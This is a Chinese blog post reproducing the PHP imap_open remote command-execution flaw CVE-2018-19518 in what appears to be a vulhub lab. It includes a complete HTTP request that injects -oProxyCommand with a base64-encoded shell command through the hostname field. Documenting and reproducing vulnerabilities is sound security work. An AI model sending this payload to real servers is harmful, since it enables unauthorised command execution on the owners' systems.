PHP imap 远程命令执行漏洞(CVE-2018-19518)

最新推荐文章于 2024-07-17 17:46:05 发布
最新推荐文章于 2024-07-17 17:46:05 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: php imap 命令执行
本文为博主原创文章,未经博主允许不得转载。
本文链接:https://blog.csdn.net/lhh134/article/details/88542587
版权

0x01 简介

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

0x02 影响版本

PHP:5.6.38
系统:Debian/ubuntu

0x03 漏洞复现

1.漏洞复现页面是一个测试邮件服务器能否成功连接的页面,我们需要在此页面填写邮件服务器地址、用户名和密码。
在这里插入图片描述
2.使用bp构造如下数据包发送。
可执行命令echo ‘1234567890’>/tmp/test0001

POST / HTTP/1.1
Host: XXX:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://XXX:8080/
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Connection: close
Upgrade-Insecure-Requests: 1

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}a&username=222&password=333

在这里插入图片描述

3.进入漏洞环境,可以看到命令命令执行成功。
在这里插入图片描述
个人感觉:利用条件太高。

0x04 参考

https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
https://bugs.php.net/bug.php?id=77153

LQxdp
关注
专栏目录
PHP imap 远程命令执行漏洞复现(CVE-2018-19518
0xSec
12-27 1181
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
HSC Mailinspector loader.php 任意文件读取漏洞复现(CVE-2024-34470)
0xSec
06-03 610
由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。
xampp 存储型XSS (CVE-2019-8924)
最新发布
qq_23003811的博客
07-17 277
XAMPP是一个把Apache网页服务器与PHP、Perl及MariaDB集合在一起的安装包,允许用户可以在自己的电脑上轻易的创建网页服务器。
CVE-2018-19518 PHP-IMAP 复现和学习 (环境CTFShow web312)
paidx0
08-09 467
CVE-2018-19518复现和学习 漏洞描述 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubuntu中默认使用ssh来代替rs
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现该漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1010
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518
weixin_45605352的博客
05-08 1767
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
Cyrus IMAP Server的四个漏洞分析
03-03
Stefan Esser发现了Cyrus IMAP Server的四个漏洞,其中IMAPMAGICPLUS预验证远程缓冲区溢出漏洞最危险,也最容易利用。本文主要介绍对定位漏洞和触发漏洞进行分析,给出了利用程序的实现方法。
一次利用imap漏洞的入侵
收集盒 Book box
09-06 7574
一次利用imap漏洞的入侵 作者 : geniusbb  email : geniusbb@hotmail.com 系统 : Linux 以下文章是菜鸟写给菜鸟交流的 ,高手就免看了,欢迎来信交换心得 。  [cracker@ns2:~/ ] nmap -s
CVE-2018-19518- imap 远程命令执行漏洞分析
lyy0xfff的博客
08-03 2614
CVE-2018-19518 IMAP 远程命令执行漏洞分析 0x00 漏洞介绍 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubu
cve-2018-19518漏洞复现
m0_74402888的博客
04-28 623
php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材
2401_84973631的博客
05-13 237
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包。%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功。这里我们进入容器查看刚才文件是否创建成功,先查询id。使用burp进行抓包,并发送到Repeater里。然后我们进入到该目录下使用docker启动。首先进入环境,最好在root权限下进行。查看容器id后在下面命令中输入id进入。然后我们修改数据包,添加一段执行代码。
PHP--远程命令执行漏洞CVE-2018-19518复现
从不专注的人的博客
06-28 653
目录漏洞介绍漏洞复现进入容器移除环境 漏洞介绍 -php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令。 -debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等。 -ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行
php5.6.31升级5.6.40(修复PHP multipart/form-data 远程DOS漏洞
bigwood99的博客
09-07 1166
php官网下载软件包。 https://www.php.net/downloads 下载页面默认是最新版内容,要找到较早的版本,在页面右侧找“Old archives ”,点击可以看到大量较早版本软件包。 软件包准备好,下一步就是准备编译安装。 为了确保新版php支持软件系统正常运作,需要了解旧版编译的参数。 使用如下命令获得: php -i 注意,建议在php旧版目录下执行。 之后,按照它编译新版php即可。编译成功,执行make && make install完.
解决安装PHP 5.6.40版本途中坑坑洼洼
岩的博客
12-01 789
linux安装php出现的一些问题记录。
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞PHPMyAdmin是一个广受欢迎的Web...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值